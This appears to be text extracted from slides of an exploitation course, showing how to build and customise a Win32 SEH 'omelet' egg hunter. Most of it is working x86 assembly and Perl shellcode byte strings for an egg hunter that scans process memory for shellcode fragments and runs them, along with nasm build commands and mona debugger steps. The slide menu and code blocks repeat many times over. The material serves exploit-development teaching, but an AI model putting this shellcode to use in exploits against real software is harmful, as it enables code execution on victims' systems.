create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg

reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler

SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.

EDI → 0x00000000

Access Violation

!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg1.bin"!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg2.bin"!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg3.bin"

egg1

egg2

egg3

egg1 (0x000FDxxx)

egg2 (0x000FDxxx)

egg3 (0x000FDxxx)

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

w32_SEH_omelet.asm / modified shell code 1 my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

my $shlEDI = "\x66\xBF\x80\x1F\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7". “\xD1\xE7\xD1\xE7”; #0x1F80 shift x 7

my $omelet_code = "\x90\x90\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

w32_SEH_omelet.asm / modified shell code 1

my $shlEDI = "\x66\xBF\x80\x1F\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7". “\xD1\xE7\xD1\xE7”; #0x1F80 shift x 7

my $omelet_code = "\x90\x90\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

omit…

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

w32_SEH_omelet.asm / modified shell code 1

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

w32_SEH_omelet.asm / modified shell code 1

start: XOR EDI, EDI jmp SHORT reset_stack

create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg

reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler

SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.

start: XOR EDI, EDI jmp SHORT reset_stack

create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket MOV EDI, ESI ; EDI = end of egg

reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler

SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

w32_SEH_omelet.asm / modified shell code 1

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

custom_w32_SEH_omelet.asm

marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack

copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg

done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

custom_w32_SEH_omelet.asm BITS 32

; egg: ; LL II M1 M2 M3 DD DD DD ... (LL * DD) ; LL == Size of eggs (same for all eggs) ; II == Index of egg (different for each egg) ; M1,M2,M3 == Marker byte (same for all eggs) ; DD == Data in egg (different for each egg)

marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack

create_SEH_handler: PUSH ECX ; SEH_frames[0].nextframe == 0xFFFFFFFF MOV [FS:EAX], ESP ; SEH_chain -> SEH_frames[0] CLD ; SCAN memory upwards from 0 scan_loop: MOV AL, egg_size ; EAX = egg_size egg_size_location equ $-1 - $$ REPNE SCASB ; Find the first byte PUSH EAX ; Save egg_size MOV ESI, EDI LODSD ; EAX = II M2 M3 M4 XOR EAX, (marker << 8) + 0xFF ; EDX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index marker_bytes_location equ $-3 - $$ CMP EAX, BYTE max_index ; Check if the value of EDX is < max_index max_index_location equ $-1 - $$ JA reset_stack ; No -> This was not a marker, continue scanning POP ECX ; ECX = egg_size IMUL ECX ; EAX = egg_size * egg_index == egg_offset ; EDX = 0 because ECX * EAX is always less than 0x1,000,000 ADD EAX, [BYTE FS:EDX + 8] ; EDI += Bottom of stack == position of egg in shellcode. XCHG EAX, EDI copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg

reset_stack: ; Reset the stack to prevent problems cause by recursive SEH handlers and set ; ourselves up to handle and AVs we may cause by scanning memory: XOR EAX, EAX ; EAX = 0 MOV ECX, [FS:EAX] ; EBX = SEH_chain => SEH_frames[X] find_last_SEH_loop: MOV ESP, ECX ; ESP = SEH_frames[X] POP ECX ; EBX = SEH_frames[X].next_frame CMP ECX, 0xFFFFFFFF ; SEH_frames[X].next_frame == none ? JNE find_last_SEH_loop ; No "X -= 1", check next frame POP EDX ; EDX = SEH_frames[0].handler CALL create_SEH_handler ; SEH_frames[0].handler == SEH_handler

SEH_handler: POPA ; ESI = [ESP + 4] -> struct exception_info LEA ESP, [BYTE ESI+0x18] ; ESP = struct exception_info->exception_address POP EAX ; EAX = exception address 0x???????? OR AX, 0xFFF ; EAX = 0x?????FFF INC EAX ; EAX = 0x?????FFF + 1 -> next page JS done ; EAX > 0x7FFFFFFF ===> done XCHG EAX, EDI ; EDI => next page JMP reset_stack done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.

db marker_bytes_location db max_index_location db egg_size_location

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

custom_w32_SEH_omelet.asm build C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHun ting\w32 SEH omelet shellcode v0>"c:\Program Files\nasm\nasm.exe" -f bin -o cust om_w32_SEH_omelet.bin custom_w32_SEH_omelet.asm -w+error

C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHun ting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py custom_w32_SEH_omelet.bin she llcode.bin calceggs_custom.txt 127 0xBADA55

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

custom_w32_SEH_omelet.asm

marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack

copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg

done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

custom_w32_SEH_omelet.asm

marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack

copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg

done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

custom_w32_SEH_omelet.asm

marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack

copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg

done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.

How to made Omelet-Egg-Hunter ?Track3. Exploitation

Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting

ROP( Return Oriented Programming)

Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC

ROP (Return Oriented Programming)

custom_w32_SEH_omelet.asm

marker equ 0x280876 egg_size equ 0x3 max_index equ 0x2 start: mov ebx,0xffffffff-egg_size+1 jmp SHORT reset_stack

copy_loop: REP MOVSB ; copy egg to basket CMP EBX, 0xFFFFFFFF JE done INC EBX MOV EDI, ESI ; EDI = end of egg

done: XOR EAX, EAX ; EAX = 0 CALL [BYTE FS:EAX + 8] ; EDI += Bottom of stack == position of egg in shellcode.

Thank You :)

See you the week after next week